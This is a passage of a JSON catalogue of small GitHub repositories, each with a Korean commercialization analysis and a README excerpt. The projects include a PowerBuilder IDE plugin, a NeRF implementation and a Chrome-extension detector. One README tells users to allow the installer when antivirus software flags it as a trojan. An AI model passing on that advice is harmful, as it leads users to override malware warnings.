kullanabilirsiniz.\n\nÖrnek IDE eklentileri:\n- [vscode](https://marketplace.visualstudio.com/items?itemName=ritwickdey.LiveServer)\n- [atom](https://atom.io/packages/atom-live-server)\n\nPython SimpleHTTPServer:\n- `python3 -m http.server`\n\n## Canlı Demo\n[Godot'yu Beklerken](http://godotyubeklerken.com:8000)\n\n## Komutlar\n\n- Davul\n- Melodi\n- Bass\n- Piyano\n- Davul değiştir\n- Melodi değiştir\n- Bass değiştir\n- Piyano değiştir\n- Ritim arttır\n- Ritim azalt\n- Söyle*\n\n\n## Proje Lisansı\n\nBu proje MIT Lisansı lisanslanmıştır. Detaylar için LICENSE dosyasına bakabilrsiniz.","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"kitsonk/trusc","github_url":"https://github.com/kitsonk/trusc","stars":9,"language":"Rust","license":"NOASSERTION","abandonment_months":61,"description":"# kitsonk/trusc 상업화 분석\n\n## 왜 보물인가\nTypeScript 개발자들이 복잡한 설정 없이 빠르게 프로젝트를 시작할 수 있도록 돕는 자동화 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: TypeScript 개발자 대상 클라우드 기반 프로젝트 초기화 플랫폼 (월 구독)\n2. **내부 업무 도구**: 대규모 개발팀의 표","readme_excerpt":"# trusc\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"unixpickle/learn-nerf","github_url":"https://github.com/unixpickle/learn-nerf","stars":8,"language":"Python","license":"unknown","abandonment_months":48,"description":"# learn-nerf 저장소 분석\n\n## 왜 보물인가\n사진들로부터 3D 영상을 자동 생성하는 신경망 학습 코드로, 영화·게임·건축 시각화 등 수많은 산업에서 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **3D 콘텐츠 생성 SaaS**: 사진을 업로드하면 3D 모델로 변환해주는 웹서비스 (부동산 매물, 상품 촬영용)\n2. **영상제작 ","readme_excerpt":"# learn-nerf\n\nThis is a JAX implementation of [Neural Radiance Fields](https://arxiv.org/abs/2003.08934) for learning purposes.\n\nI've been curious about NeRF and its follow-up work for a while, but don't have much time to explore it. I learn best by doing, so I'll be implementing stuff here to try to get a feel for it.\n\n# Usage\n\nThe steps to using this codebase are as follows:\n\n 1. [Generate a dataset](#generating-a-dataset) - run a simple Go program to turn any `.stl` 3D model into a series of rendered camera views with associated metadata.\n 2. [Train a model](#training-a-model) - install the Python dependencies and run the training script.\n 3. [Render a novel view](#render-a-novel-view) - render a novel view of the object using a model.\n\n## Generating a dataset\n\nI use a simple format for storing rendered views of the scene. Each frame is stored as a PNG file, and each PNG has an accompanying JSON file describing the camera view.\n\nFor easy experimentation, I created a Go program to re","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"shametha/Dice-Roller","github_url":"https://github.com/shametha/Dice-Roller","stars":7,"language":"Dart","license":"unknown","abandonment_months":54,"description":"# Dice-Roller 상용화 분석\n\n## 왜 보물인가\n주사위 굴림이 필요한 게임, 보드게임, 교육 프로그램 등 다양한 분야에서 공정하고 편리한 디지털 솔루션을 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 보드게임 플랫폼이나 TRPG(역할극 게임) 웹사이트에 주사위 굴림 기능을 탑재한 구독형 서비스\n2. **내부","readme_excerpt":"# Dice roller\n\nA flutter Application where you can roll die and land on a number on the dice.\n# Dice Roller\n\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"Kludex/fastapi-authorization","github_url":"https://github.com/Kludex/fastapi-authorization","stars":5,"language":"Python","license":"MIT","abandonment_months":48,"description":"# Kludex/fastapi-authorization 분석\n\n## 왜 보물인가\n웹서비스에 접근 권한을 관리하는 보안 기능을 간편하게 추가할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회원별로 다른 기능 접근 권한을 관리하는 구독형 소프트웨어\n- **내부 업무 도구**: 직원별 직급에 따라 볼 수 있는 보고서와 데이터를 제","readme_excerpt":"# FastAPI Authorization\n\n### Installation\n\n```bash\npip install fastapi-authorization\n```\n\n### Usage\n\nCurrently, there are two models available:\n* RBAC: Role-based Access Control\n* ABAC: Attribute-based Access Control\n\nYou can check how to use them on:\n* [RBAC](./examples/rbac/app/main.py)\n* [ABAC](./examples/abac/app/main.py)\n\n### Roadmap\n\n* [ ] 100% Coverage\n* [ ] Documentation\n* [ ] Examples\n\n### License\n\nThis project is under the MIT license.\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Astrotomic/laravel-dns","github_url":"https://github.com/Astrotomic/laravel-dns","stars":7,"language":"PHP","license":"MIT","abandonment_months":33,"description":"# Astrotomic/laravel-dns 분석\n\n## 왜 보물인가\n웹사이트 운영에 필수적인 도메인 주소 관리를 자동화해주는 도구로, 복잡한 설정 작업을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **웹호스팅 회사의 관리 대시보드**: 고객들이 자신의 도메인 설정을 스스로 관리할 수 있는 기능 제공\n2. **멀티테넌트 SaaS 플랫폼**: 각","readme_excerpt":"# Laravel DNS\n\n[![Latest Version](http://img.shields.io/packagist/v/astrotomic/laravel-dns.svg?label=Release&style=for-the-badge)](https://packagist.org/packages/astrotomic/laravel-dns)\n[![MIT License](https://img.shields.io/github/license/Astrotomic/laravel-dns.svg?label=License&color=blue&style=for-the-badge)](https://github.com/Astrotomic/laravel-dns/blob/master/LICENSE)\n[![Offset Earth](https://img.shields.io/badge/Treeware-%F0%9F%8C%B3-green?style=for-the-badge)](https://plant.treeware.earth/Astrotomic/laravel-dns)\n[![Larabelles](https://img.shields.io/badge/Larabelles-%F0%9F%A6%84-lightpink?style=for-the-badge)](https://www.larabelles.com/)\n\n![](https://img.shields.io/badge/PHP-^8.0-777BB4?style=for-the-badge&logo=php&logoColor=white)\n![](https://img.shields.io/badge/Laravel-^8.0-FF2D20?style=for-the-badge&logo=laravel&logoColor=white)\n\n[![GitHub Workflow Status](https://img.shields.io/github/workflow/status/Astrotomic/laravel-dns/pest?style=flat-square&logoColor=white&logo=githu","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"lxb320124/pbhelper","github_url":"https://github.com/lxb320124/pbhelper","stars":7,"language":"","license":"unknown","abandonment_months":58,"description":"# pbhelper 저장소 분석\n\n## 왜 보물인가\n이 저장소는 매우 오래된 프로젝트(마지막 업데이트 2021년)로, 현재 유지보수가 되지 않고 있어 새로운 프로젝트의 기반으로 활용하기보다는 아카이빙 또는 학습 자료의 가치가 제한적입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 특정 작업 자동화를 위한 독립적인 소프트웨어로 운영\n2","readme_excerpt":"        PBHelper plugin说明\n\n 强大的PowerBuilder开发环境插件。\n一.功能\n    1.当前行高亮显示。个别电脑觉得闪烁厉害，可以通过设置关闭。\n    2.单击关键词部分，自动查询并以指定底色显示。\n    3.语法颜色方案调整，提供自定义设置.\n    4.加上代码行号,并且双击行号完成 加/去 单行注释功能\n    5.可粘贴3种注释类型,提供自定义设置。\n    6.可粘贴常用 API 声明,提供自定义设置增加自己常用API，或者修改win32api.txt增添新函数。\n    7.提供记忆型粘贴板,可对历史复制内容重复粘贴。保留近50次内容。\n    8.提供全局查找功能，支持表达式。在所有源代码中(包括 datawindow 对象)查找需要的内容,双击可以定位.暂时不提供替换功能。\n    9.提供全部对象选择性一键导出功能。此功能可用于多人开发时的版本维护。\n    10。提供个性化状态栏内容显示功能。可通过设置进行定制。\n    11.增加快捷键,CTRL+ALT+向上箭头,复制下一行内容,CTRL+ALT+向下箭头,复制上一行内容.CTRL+ALT+C复制当前行\n    12.增加自动匹配录入功能,例如()[]{}\"\"''自动成对,+-*/=<>号前后自动加空格. 可以通过设置关闭\n    13.调整 MDI 模式为 TAB 模式.可任意切换。\n    14.大小写转换.\n    15.代码整理功能，让格式更加漂亮。\n    16.代码编辑时，对象名称上右键菜单，可直接打开对象进行编辑。\n    17.获取颜色值，可粘贴。\n    18.修改 pb_chs.ini,可以实现汉化\n\n二.安装\n    本程分PB9以下版本和PB10以上版本(即 ansi 版和 UNICODE 版本),用不同版本,安装时会自动判断.各版本通用.已测试版本 PB8,PB9,PB11.5,PB12.5,PB12.6\n注意:安装时要把所有PB程序关闭退出!!!!!!!!!!!!!!!!!!!!!!\n    安装和运行时,有可能会被360等杀毒软件报病毒或木马或其他情况,请允许通过。没有危害行为，只是修改PB程序，以确保 pluging 能够起作用。\n\n准备好,可以运行 Setup.exe ,快速安装 或者卸载.\n开始享受我们的PB IDE ","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"dragse/proxmox-api-go","github_url":"https://github.com/dragse/proxmox-api-go","stars":5,"language":"Go","license":"GPL-3.0","abandonment_months":55,"description":"# Proxmox API Go - 분석 보고서\n\n## 왜 보물인가\n복잡한 서버 관리 시스템을 간단한 명령어로 자동화할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 호스팅 회사의 자동화 서비스**: 고객이 웹 대시보드에서 클릭만 해도 가상 서버가 자동으로 생성되고 관리되는 SaaS 서비스\n2. **기업의 IT 운영 도구**: 회","readme_excerpt":"# proxmox-api-go\n\nThe Proxmox API in golang. This Framework is still work in progress.\n\n## Features\n\n### Cluster\n- [x] Version Endpoint\n- [x] Get Next VM ID\n\n### Node\n- [x] List all Nodes\n- [x] List all VMs of the Node\n- [x] Get Node Status of a specific Node\n- [x] Get Time Configuration of a specific Node\n- [x] Update Time Zone of a specific node\n\n### VM\n- [x] Create VM\n- [x] Create VNC TCP Proxy\n- [x] Get VM Status\n- [x] Update VM Status\n- [x] Get Firewall Log\n- [x] Get Firewall Options\n- [x] Update Firewall Options\n- [x] List IPSets\n- [x] Create IPSets\n- [x] Delete IPSets\n- [x] Add CIDR to IPSet\n- [x] Remove CIDR from IPSet\n- [x] Copy a specific VM\n- [x] Update the config of a VM\n- [x] Resize a disk of a VM\n- [x] Set CloudInitOptions\n\n### Pools\n- [x] Create Pool\n- [x] List All Pools\n- [x] Show Pool Details\n\n## Installation\n\n``go get github.com/dragse/proxmox-api-go@v1.1.0``\n\n## Usage\n\nCreate at first a client object. This objects manage and handle the http connections to the nodes\n\n","composite_score":0.5002,"license_safety_tag":"restricted"},{"name":"cooldogedev/libPromise","github_url":"https://github.com/cooldogedev/libPromise","stars":5,"language":"PHP","license":"MIT","abandonment_months":37,"description":"# libPromise 분석 리포트\n\n## 왜 보물인가\n프로그래밍에서 복잡한 작업 순서를 간단하게 정리해주는 도구로, 이를 필요로 하는 개발자들에게 즉시 적용 가능한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **API 판매**: 비동기 작업 처리가 필요한 클라우드 서비스 제공 업체가 자신의 API에 탑재하여 개발자에게 판매\n2. **SaaS 서비스**","readme_excerpt":"# libPromise\n\nA minimalistic implementation of [Promises](https://en.wikipedia.org/wiki/Futures_and_promises) for PHP.\n\n## Installation via DEVirion\n\nInstall the [DEVirion](https://poggit.pmmp.io/ci/poggit/devirion/DEVirion) plugin and start your server. This will create a `virions` folder in your server's root directory.\n\n```\nserver_root\n| -> plugins\n|    --> DEVirion.phar\n| -> virions\n```\n\n- Download pre-compiled `.phar` files can be downloaded from [poggit](https://poggit.pmmp.io/ci/cooldogedev/libPromise/libPromise).\n- Place the pre-compiled `.phar` in the `virions` directory\n\n## Running from source code\n\nClone the repository via git `git clone git@github.com:cooldogedev/libPromise.git`. This will create a `libPromise` folder in your directory.\n\n```\nyour_plugin\n| -> src\n|    --> cooldogedev\n|       --> libPromise\n```\n\n- Place the `cooldogedev\\libPromise` folder in your `src` directory.\n\n## Promise Examples\n\n### Hello world\n\n```php\n$promise = new Promise(\n    function (): string {\n ","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"peterzernia/wanderlist","github_url":"https://github.com/peterzernia/wanderlist","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":50,"description":"# Wanderlist 저장소 분석\n\n## 왜 보물인가\n여행 계획과 장소 추천을 자동으로 정리해주는 개인 맞춤형 여행 가이드 앱으로, 복잡한 여행 준비 과정을 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 여행 계획 SaaS 서비스**\n사용자가 관심 있는 도시와 여행 스타일을 입력하면 자동으로 일정, 숙소, 맛집을 추천하는 구독형 서비스로 운","readme_excerpt":"# Wanderlist\n![](https://travis-ci.com/peterzernia/wanderlist.svg?branch=master)\n\nWanderlist is a responsive, single-page travel web application built on the Django\nframework with a Reactjs frontend. Users can create a custom map of all the countries they have traveled to, as well as write Trip Reports about their travels.\n\nNow available on [Google Play](https://play.google.com/store/apps/details?id=dev.wanderlist.wanderlist)\n\n## Development\n\nCreate backend/local_settings.py and frontend/.env files for development from their respective .dist files\nand fill them out with the appropriate environment variables.\n\nBuild the docker containers and install dependencies:\n\n```\nmake build\n```\n\nSet up the database:\n\n```\nmake init\n```\n\nStart the servers:\n\n```\nmake up\n```\n\nThe Django dev server is now available at localhost:8000, and the React dev server is available at localhost:3000.\n\nUnit Test:\n\n```\nmake test\n```\n\nStop and remove the docker containers:\n\n```\nmake clean\n```\n\n## REST API\n\nThe API en","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"WaderManasi/epic-quotes","github_url":"https://github.com/WaderManasi/epic-quotes","stars":10,"language":"JavaScript","license":"unknown","abandonment_months":61,"description":"# Epic Quotes 저장소 분석\n\n## 왜 보물인가\n유명한 인물들의 명언을 체계적으로 모아 정리한 데이터로, 교육·마케팅·앱 개발 등 다양한 분야에서 즉시 활용할 수 있는 콘텐츠 자산입니다.\n\n## 어디에 쓸 수 있나\n- **영감 앱 구독 서비스**: 매일 아침 사용자에게 명언을 배달하는 유료 모바일 앱\n- **기업 교육 플랫폼**: 리더십 교육이나 ","readme_excerpt":"### :sunflower: Attempt to create an NPM package to fetch quotes based on the _various categories_ , explained in 'Bhagawad Gita' : Holy scripture which includes dialogues between Arjuna and Lord Krishna. \n\n<img src=\"https://socialify.git.ci/WaderManasi/epic-quotes/image?issues=1&language=1&owner=1&pulls=1&stargazers=1&theme=Light\" alt=\"epic-quotes\" width=\"540\" height=\"220\" />\n\n### ⏩ [View on NPM Registry](https://www.npmjs.com/package/epic-quotes)\n\n## Installation\n\n``` $ npm i --save epic-quotes  ```\n\n## Parameters\n\nNote: All parameters are _'case in-sensitive'_\n||Type|Parameters (categories)|\n|---|---|---|\n|1.| string |wisdom|\n|2.| string |truth|\n|3.| string |love|\n|4.| string |peaceHappiness|\n|5.| string |death|\n|6.| string |lifeDecisions|\n\n||Methods|\n|---|---|\n|1.|getQuote( '_category_' )|\n\n---  \n\n## Usage\n\n```\n\n// including the package\nconst gita = require('epic-quotes');\n\nconst getMessage = async() => {\n\n// storing fetched data\nvar messageFetched = await gita.getQuote('wisdom');\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"EvanBacon/metro-minify-esbuild","github_url":"https://github.com/EvanBacon/metro-minify-esbuild","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":44,"description":"# Metro-Minify-Esbuild 사업화 분석\n\n## 왜 보물인가\n모바일 앱과 웹 서비스를 만드는 개발자들이 프로그램 용량을 줄이는 데 쓰는 전문 도구로, 기술력 있는 팀이 만든 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS**: 클라우드 기반 코드 최적화 플랫폼으로 개발사들에게 월 구독료 받기\n- **내부 업무 도구**: 대형 I","readme_excerpt":"# metro-minify-esbuild\n\n> Use [ESBuild](https://github.com/evanw/esbuild) to make your React Native code bundle faster.\n\nMetro Bundler (used for React Native, Instagram, Internal Facebook) allows for any minifier you'd like. ESBuild is a very powerful transpiler / bundler -- but if you use it for transpilation then you can't use any babel plugins (like reanimated, decorators, strip flow types (required for React Native)). So a decent compromise is to use ESBuild for smaller tasks like minifying the output JavaScript bundle.\n\nYou write JavaScript -> Babel turns it into older JavaScript -> Minifier makes it small.\n\nBy default, Metro uses uglify-es, which currently produces the smallest bundles out of all popular minifiers, but it's ~46x slower than ESBuild.\n\n> View [minifier benchmarks](https://github.com/privatenumber/minification-benchmarks).\n\n## Usage\n\n```\nyarn add -D metro-minify-esbuild esbuild\n```\n\nNow set ESBuild with `transformer.minifierPath`, and pass in [`ESBuild` options](htt","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"neargle/crx-scouter","github_url":"https://github.com/neargle/crx-scouter","stars":6,"language":"","license":"unknown","abandonment_months":51,"description":"# crx-scouter 분석 보고서\n\n## 왜 보물인가\n크롬 확장 프로그램의 성능과 보안을 자동으로 검사하는 도구로, 개발자와 기업이 품질 낮은 확장 프로그램 배포를 미리 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 크롬 확장 프로그램 개발사들을 위한 월간 자동 품질 검사 서비스\n2. **내부 업무 도구**: 대기업의 I","readme_excerpt":"\n<p align=\"center\"><a href=\"https://github.com/neargle/crx-scouter\" target=\"_blank\" rel=\"noopener noreferrer\"><img height=\"100\" src=\"img/favicon.svg.png\" alt=\"Vue logo\"><img height=\"100\" src=\"img/title.png\" alt=\"Vue logo\"></a></p>\n\n[[中文文档](./readme-cn.md)]\n\n**crx-scouter.js** can detect which Chrome extensions we are using quietly, and can detect whether the person before the browser is a awesome hacker or a high-end programmer 🐱, It can be used for honeypots, human-machine identification, countermeasures of ad blocking, pre-checks for extension exploits, and so on.\n\nThe principle of crx-scouter.js is based on an experiment I did with evi1m0 in 2017. Google seems to want to solve this problem, but with little success. Details can be found in [the principle document](#WHY).\n\nDemo in: [https://blog.neargle.com/crx-scouter/](https://blog.neargle.com/crx-scouter/).\n\n## HOW TO USE\n\nDetect a specified extension\n\n```javascript\nconst { check_one } = await import('./scouter/scouter')\ncheck_one(","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"RickCarlino/naivechain-ts","github_url":"https://github.com/RickCarlino/naivechain-ts","stars":8,"language":"TypeScript","license":"Apache-2.0","abandonment_months":103,"description":"# RickCarlino/naivechain-ts 평가 분석\n\n## 왜 보물인가\n블록체인 기술의 핵심 원리를 간단하게 구현한 교육용 오픈소스로, 암호화폐나 디지털 거래 기술에 관심 있는 사람들의 학습 자료로 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 교육 플랫폼**: 대학교나 온라인 코딩 학원에서 블록체인 개념을 시각적으로 가르치는 교육","readme_excerpt":"# Naivechain TS - Typescript port of Naivechain\n\n### What Is This?\n\nI (Rick Carlino) have ported @lhartikk's [Naivechain](https://github.com/lhartikk/naivechain) project to Typescript.\n\nNaivechain is an easy-to-understand blockchain in 200 lines of code. Porting it to Typescript (IMHO) makes it even easier to understand. All credit for this great work goes to the [original author](https://github.com/lhartikk).\n\n### What's Different in This Fork?\n\n * Ported `main.js` to Typescript as `main.ts`.\n * Moved non-init functions into `naivechain.ts`.\n * Added a test command: `npm run test`.\n\n---\n\n### Motivation\n\nAll the current implementations of blockchains are tightly coupled with the larger context and problems they (e.g. Bitcoin or Ethereum) are trying to solve. This makes understanding blockchains a necessarily harder task, than it must be. Especially source-code-wisely. This project is an attempt to provide as concise and simple implementation of a blockchain as possible.\n\n\n### What is b","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"pilhacheia/tretadev","github_url":"https://github.com/pilhacheia/tretadev","stars":5,"language":"","license":"unknown","abandonment_months":44,"description":"# tretadev 저장소 분석\n\n## 왜 보물인가\n마지막 업데이트가 2022년 10월로 2년 이상 방치되어 있어, 현재 상태로는 실제 비즈니스 기반으로 삼기 어려운 상태입니다.\n\n## 어디에 쓸 수 있나\n제공된 정보가 극히 제한적(설명 없음, 코드 내용 미파악)하여 구체적인 활용 시나리오를 특정하기 불가능합니다. 저장소 README나 코드를 직접 검토해야","readme_excerpt":"# TretaDev\n\nTretas da cena dev BR semanais, centralizadas num único lugar.\nE ainda deixa marquinha verde no grid do GitHub!!!\n\nLista das tretas nas [issues](https://github.com/pilhacheia/tretadev/issues)\n\nContribua com sua treta abrindo uma [Issue](https://github.com/pilhacheia/tretadev/issues/new)\n\n### Treta Coin - TRT\nParticipe das tretas e ganhe tokens\nhttps://twitter.com/lincolixavier/status/1468007894817902598\n\n\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"kaustubhdhole/natural-dont-know","github_url":"https://github.com/kaustubhdhole/natural-dont-know","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":55,"description":"# natural-dont-know 저장소 분석\n\n## 왜 보물인가\nAI 모델이 자신의 약점을 스스로 인식하고 \"모른다\"고 말할 수 있도록 학습시키는 기술로, 잘못된 답변을 줄여 AI의 신뢰도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **고객 상담 챗봇 SaaS**: 고객 문의에 \"확실하지 않으니 전문가에게 연결해드리겠습니다\"라고 안전하게 답변\n","readme_excerpt":"## Natural Don't Know: Saying No is An Art\n\nContains code for the following paper:\n\n> _[Saying No is An Art: Contextualized Fallback Responses for Unanswerable Dialogue Queries](https://aclanthology.org/2021.acl-short.13.pdf)_ Ashish Shrivastava, Kaustubh D. Dhole, Abhinav Bhatt, Sharvani Raghunath, 2021\n\n<p align=\"center\">\n<img src=\"https://github.com/kaustubhdhole/natural-dont-know/blob/main/dontknow.png\" width=\"150\" height=\"90\">\n</p>\n\nThis repository contains code for calling the Natural Don't Know Response Service using a HuggingFace model as well as a front-end interface.\n\n![Alt text](examples.png?raw=true \"Title\")\n\n#### Using the model directly for inference\nYou can use our [model deployed at HuggingFace](https://huggingface.co/ashish-shrivastava/dont-know-response) directly.\n\nOR \n#### Call the service locally\n```bash\npip3 install -r requirements.txt\n```\n```python\nfrom ndk_generator import NdkGenerator\nndkGenerator = NdkGenerator()\nquestion = \"What is the effect of demonetization","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"af/planner-pdf","github_url":"https://github.com/af/planner-pdf","stars":10,"language":"","license":"MIT","abandonment_months":46,"description":"# af/planner-pdf 상용화 분석\n\n## 왜 보물인가\nPDF 파일로 일정표를 자동 생성해주는 도구로, 복잡한 일정 관리를 간단하게 문서화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프리랜서와 소규모 팀을 위한 \"일정표 자동 PDF 변환 서비스\"로 월 구독 모델 운영\n2. **내부 업무 도구**: 기업의 프로젝트 관리 ","readme_excerpt":"# Hyperpaper Planner\n\nLinked dayplanner pdf for large e-readers (reMarkable 1 & 2, Supernote, Boox, etc). Inspired by the Bullet Journal method, GTD, and other information management systems.\n\nCustom full-year and school-year versions are now available for purchase! You can [order here](https://hyperpaper.me) and customize:\n* Header layouts that leave space for your device's on-screen menus (reMarkable, Supernote, Boox Max Lumi)\n* Day templates (lined or dotted, shaded working hours)\n* Weekly tasks template (lined, dotted, kanban board)\n* Quarterly template (lined, dotted)\n* Extra linked collections of pages (Notes, Projects, Habit tracking, Meeting notes, custom sections of your choosing)\n* **Date-aware collections** – you can set up weekly/monthly collections where the current week/month is linked from every corresponding day page.\n\n## Download \n\n2-month demo versions are available at https://hyperpaper.me/#try. There are demo variations for reMarkable/Supernote/Boox devices, with li","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"patilharshal16/data-structures","github_url":"https://github.com/patilharshal16/data-structures","stars":8,"language":"Java","license":"unknown","abandonment_months":60,"description":"# patilharshal16/data-structures 분석\n\n## 왜 보물인가\n프로그래머들이 복잡한 문제를 빠르게 푸는 데 필요한 기본 도구 모음을 한곳에서 배울 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초급 개발자 대상 강의 커리큘럼에 이 자료를 통합하여 유료 강좌 제공\n2. **기업 신입 교육 도","readme_excerpt":"# Data Structures and Algorithms\nComputer science data structures and algorithms implementation from scratch\n\n## Stack (Last In First Out)\n[Stack](https://en.wikipedia.org/wiki/Stack_(abstract_data_type)) is an abstract data type that serves as a collection of elements, with two main principal operations:\n* Push, which adds an element to the collection, and\n* Pop, which removes the most recently added element that was not yet removed.\n\n[Useful stack visualization using array](https://www.cs.usfca.edu/~galles/visualization/StackArray.html)\n\n## Queue (First In First Out)\n[Queue](https://en.wikipedia.org/wiki/Queue_(abstract_data_type)) is a collection of entities that are maintained in a sequence and can be modified by the addition of entities at one end of the sequence and the removal of entities from the other end of the sequence. By convention, the end of the sequence at which elements are added is called the back, tail, or rear of the queue, and the end at which elements are removed ","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"omerlh/zap-operator","github_url":"https://github.com/omerlh/zap-operator","stars":6,"language":"Go","license":"MIT","abandonment_months":79,"description":"# zap-operator 사업화 분석\n\n## 왜 보물인가\n보안 검사 도구를 자동으로 관리해주는 시스템으로, 기업의 웹사이트 취약점을 지속적으로 감시할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 쇼핑몰·블로그 운영자들을 위한 월간 보안 진단 자동화 서비스\n2. **내부 업무 도구**: 대기업 IT팀이 자사 웹서비스의 보안 ","readme_excerpt":"[![Docker Repository on Quay](https://quay.io/repository/omerlh/zaproxy-operator/status \"Docker Repository on Quay\")](https://quay.io/repository/omerlh/zaproxy-operator)\n# zap-operator\nA little operator that makes it easy to hack your existing applications in production. \nThis tool is intended to run again your application, that you have permissions to attack.\nPlease do not use it for malicious purposes :)\n\n[OWASP Zaproxy](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) is a great security tool, that can be used to detect a lot of security tools.\nThis operator makes it easier to test your application in production.\nTo attack an application, all you need to do is:\n* Install the operator (`helm repo add omerlh https://omerlh.github.io/zap-operator/ && helm install omerlh/zap-operator`)\n* Create the CRD:\n```\napiVersion: zaproxy.owasp.org/v1alpha1\nkind: Zaproxy\nmetadata:\n name: example-zaproxy\nspec:\n attackType: Passive\n tragetNamespace: default\n tragetIngress: <a name of e","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Tinche/cattrs","github_url":"https://github.com/Tinche/cattrs","stars":6,"language":"","license":"mit","abandonment_months":31,"description":"# Tinche/cattrs 분석\n\n## 왜 보물인가\n복잡한 데이터 형식을 자동으로 변환해주는 도구로, 개발자들이 반복적인 데이터 변환 작업을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: API 응답 데이터를 자동 변환하여 고객 데이터 처리 속도를 2배 이상 향상시키는 데이터 통합 플랫폼\n- **내부 업무 도구**:","readme_excerpt":"# cattrs\n\n<a href=\"https://pypi.python.org/pypi/cattrs\"><img src=\"https://img.shields.io/pypi/v/cattrs.svg\"/></a>\n<a href=\"https://github.com/python-attrs/cattrs/actions?workflow=CI\"><img src=\"https://github.com/python-attrs/cattrs/workflows/CI/badge.svg\"/></a>\n<a href=\"https://catt.rs/en/latest/?badge=latest\"><img src=\"https://readthedocs.org/projects/cattrs/badge/?version=latest\" alt=\"Documentation Status\"/></a>\n<a href=\"https://github.com/python-attrs/cattrs\"><img src=\"https://img.shields.io/pypi/pyversions/cattrs.svg\" alt=\"Supported Python versions\"/></a>\n<a href=\"https://github.com/python-attrs/cattrs/actions/workflows/main.yml\"><img src=\"https://img.shields.io/endpoint?url=https://gist.githubusercontent.com/Tinche/22405310d6a663164d894a2beab4d44d/raw/covbadge.json\"/></a>\n<a href=\"https://github.com/psf/black\"><img src=\"https://img.shields.io/badge/code%20style-black-000000.svg\"/></a>\n\n---\n\n**cattrs** is an open source Python library for structuring and unstructuring\ndata. _cattrs","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Jack000/DALLE-pytorch","github_url":"https://github.com/Jack000/DALLE-pytorch","stars":8,"language":"Python","license":"MIT","abandonment_months":54,"description":"# DALLE-pytorch 상용화 분석\n\n## 왜 보물인가\nAI를 사용해 텍스트 설명만으로 이미지를 자동 생성하는 기술로, 디자인 비용 없이 콘텐츠를 대량 제작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소상공인이 상품 이미지를 자동으로 만드는 온라인 도구로 판매\n- **내부 업무 도구**: 마케팅팀이 광고 배너, SNS 콘텐","readme_excerpt":"# DALL-3\n\ntry it out on colab \n<a href=\"https://colab.research.google.com/drive/1SlcC0u-tzCrHYL7yYP_DkKu8x0ehXBv0?usp=sharing\">\n    <img alt=\"Dall-3 colab link\" src=\"https://colab.research.google.com/assets/colab-badge.svg\">\n</a>\n  \nDALL-3 is a mashup of DALLE-pytorch, VQGAN and Clip-Guided Diffusion. The basic idea is to use a diffusion model instead of VAE for the decoder stage, which allows us to use 16x16 tokens instead of 32x32 while maintaining comparable image quality.\n\nThis DALLE model is meant to be used with https://github.com/Jack000/guided-diffusion\n\nminor modifications to DALLE-pytorch:\n- hardcoded 128px image size in dalle (in order to use mismatched VAE/DALLE image sizes)\n- added top-p filtering\n\nCherry picked sample images:\n\n<table>\n<tr><th>Before diffusion</th><th>After diffusion</th></tr>\n<tr><td><img src=\"./images/cube-cloud-before.jpg\" alt=\"a cube made of cloud - before\" width=\"256\"></img></td><td><img src=\"./images/cube-cloud.png\" alt=\"a cube made of cloud\"></img><","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"shametha/Flutter-RecipeApp-UI","github_url":"https://github.com/shametha/Flutter-RecipeApp-UI","stars":6,"language":"Makefile","license":"unknown","abandonment_months":54,"description":"# Flutter 레시피 앱 UI 분석\n\n## 왜 보물인가\n스마트폰 앱 개발 초보자도 따라 만들 수 있는 요리 앱 디자인 템플릿으로, 앱 개발 학습 자료나 스타트업의 빠른 프로토타입 제작에 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **요리 레시피 공유 앱 서비스**: 개인 요리사나 푸드 블로거가 자신의 레시피를 판매하는 플랫폼으로 활용\n2. ","readme_excerpt":"# Recipe-App -UI/UX\n\nA flutter application where users worldwide can share and view 